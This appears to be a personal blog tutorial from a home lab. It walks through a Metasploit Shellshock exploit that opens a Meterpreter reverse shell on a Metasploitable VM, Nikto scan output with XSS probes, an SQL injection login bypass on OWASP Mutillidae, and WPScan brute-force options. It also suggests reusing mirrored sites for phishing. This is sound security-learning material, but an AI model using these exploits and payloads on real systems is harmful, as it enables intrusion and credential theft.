Friday, August 16, 2019

Web Server and SQL Injection Attack, Nikto and Wordpress Scan

Injection attacks occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing that the request came from the web server. The most common form of this attack is the SQL injection attack, which exploits web applications to send unauthorized commands to a backend database server. Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.


HTTrack

HTTrack allows users to copy or "mirror" websites from the Internet to a local computer. It can be downloaded as a standalone tool or download (and install) in Kali using the apt-get install command.

Open terminal in Kali > type apt-get install webhttrack > type y and press Enter to continue


After installation is done, type webhttrack > press Enter.

Choose a Language preference > click Next.


Type a New project name > click Next.


Type the Web Address or URL > click Next.

Try2hack.nl is a website that you can freely hack online and contains challenges or levels in breaking their website.


Leave the default setting > click Start.



Click Browse Mirrored Website



The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl

You can perform offline web server attacks (view the source code) or modify the website and use it for social engineering attacks (phishing scam).



Web Server (Apache) Attack

I used the Metaspoitable2 VM to act as a web (Apache) server and typed the echo commands in nano editor.

msfadmin@metasploitable:~$ cd /usr/lib/cgi-bin
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo nano web.sh
[sudo] password for msfadmin: <msfadmin>

Type the echo commands > once finished hit Ctrl-X to exit > press y.


Press Enter (or type a new file name).


Make the file as executable using chmod

msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh

I made a test by opening a web browser on my Windows 10 machine and typed the URL 192.168.1.120/cgi-bin/web.sh


Enable the SQL database and launch Metasploit Framework console.


root@kali:~# service postgresql start
root@kali:~# msfconsole
[*] Starting the Metasploit Framework consOle...-

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


Set the options or parameters for the web server/Apache exploit or attack payload.
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.120
RHOST => 192.168.1.120
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/web.sh
TARGETURI => /cgi-bin/web.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           192.168.1.120    yes       The target address
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/web.sh  yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


Launch the Apache exploit to the remote target MSPLOIT VM (192.168.1.120).
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.110:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (861480 bytes) to 192.168.1.120
[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.120:49667) at 2018-10-30 04:53:34 -0400

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Mic Commands
====================

    Command       Description
    -------       -----------
    listen        listen to a saved audio recording via audio player
    mic_list      list all microphone interfaces
    mic_start     start capturing an audio stream from the target mic
    mic_stop      stop capturing audio


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


You can gather the machine's info using the shell commands available from the help option.
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux


meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:fa:dd:2a
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.1.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fefa:dd2a
IPv6 Netmask : ffff:ffff:ffff:ffff::


meterpreter > shell
Process 30362 created.
Channel 1 created.

pwd
/usr/lib/cgi-bin

ls
php
php5
web.sh


Nikto

Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items such as dangerous files/programs, checks for outdated server versions. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.



root@kali:~# nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ ERROR: No host specified

       -config+            Use this config file
       -Display+           Turn on/off display outputs
       -dbcheck            check database and other key files for syntax errors
       -Format+            save file (-o) format
       -Help               Extended help information
       -host+              target host
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -output+            Write output to this file
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -Plugins+           List of plugins to run (default: ALL)
       -port+              Port to use (default 80)
       -root+              Prepend root value to all requests, format is /directory
       -ssl                Force ssl mode on port
       -Tuning+            Scan tuning
       -timeout+           Timeout for requests (default 10 seconds)
       -update             Update databases and plugins from CIRT.net
       -Version            Print plugin and database versions
       -vhost+             Virtual host (for Host header)
                + requires a value

        Note: This is the short help output. Use -H for full help text.

root@kali:~#
root@kali:~# nikto -host 192.168.1.120     // MSPLOIT2 VM
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2018-11-05 22:32:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-11-05 22:33:23 (GMT-5) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


OWASP Broken Web Application (BWA)

OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.

Download and extract the OWASP Broken Web Application. Double-click on the VMWare configuration file (2 KB).
 

Right-click on the VM > Settings > Network Adapter > choose Custom: Specific virtual network > VMnet0



I renamed the VM to BWAPP. Click Power ON (green arrow icon). Type the login: root/owaspbwa (already displayed)


I changed the BWAPP VM IP address to 192.168.1.140/24 using the command: ifconfig eth0 192.168.1.140 netmask 255.255.255.0


I've HTTP to BWAPP from Windows 7 machine using the new IP address (192.168.1.140). Click on OWASP Mutillidae II


Hover to OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login


To view hints or the steps in performing SQL Injection attacks, click Toggle Hints > Authentication Bypass.



Type Username ' 'a' = 'a' --

There's a "space" after --


Noticed the status became User Authenticated and there's a Logged In Admin called admin




WordPress Scan (WPScan)

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.


root@kali:~# wpscan
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Examples :

-Further help ...
wpscan --help

-Do 'non-intrusive' checks ...
wpscan --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
wpscan --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
wpscan --url www.example.com --enumerate p

-Enumerate installed themes ...
wpscan --url www.example.com --enumerate t

-Enumerate users (from 1 - 10)...
wpscan --url www.example.com --enumerate u

-Enumerate users (from 1 - 20)...
ruby wpscan --url www.example.com --enumerate u[1-20]

-Enumerate installed timthumbs ...
wpscan --url www.example.com --enumerate tt

-Use a HTTP proxy ...
wpscan --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
wpscan --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
wpscan -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
wpscan -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the Database ...
wpscan --update

-Debug output ...
wpscan --url www.example.com --debug-output 2>debug.log

See README for further information.


[!] No argument supplied


root@kali:~# wpscan --url http://localhost --enumerate u
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


[i] It seems like you have not updated the database for some time
[?] Do you want to update now? [Y]es  [N]o  [A]bort update, default: [N] > y
[i] Updating the Database ...
[i] Update completed


root@kali:~# wpscan --url http://localhost
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


[!] The remote website is up, but does not seem to be running WordPress. If you are sure, use --force


root@kali:~# wpscan --url http://localhost --force --enumerate p
_______________________________________________________________
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] Started: Mon Nov  5 21:30:26 2018

[+] Interesting header: SERVER: Apache/2.4.35 (Debian)
[!] Upload directory has directory listing enabled: http://localhost/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://localhost/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting

[+] Enumerating installed plugins (only ones marked as popular) ...

   Time: 00:00:01 <==================================> (1494 / 1494) 100.00% Time: 00:00:01

[+] We found 1 plugin:

[+] Name: akismet - v4.0.8
 |  Latest version: 4.0.8 (up to date)
 |  Last updated: 2018-10-30T16:34:00.000Z

[+] Finished: Mon Nov  5 21:30:32 2018
[+] Elapsed time: 00:00:06
[+] Requests made: 1558
[+] Memory used: 70.914 MB

No comments:

Post a Comment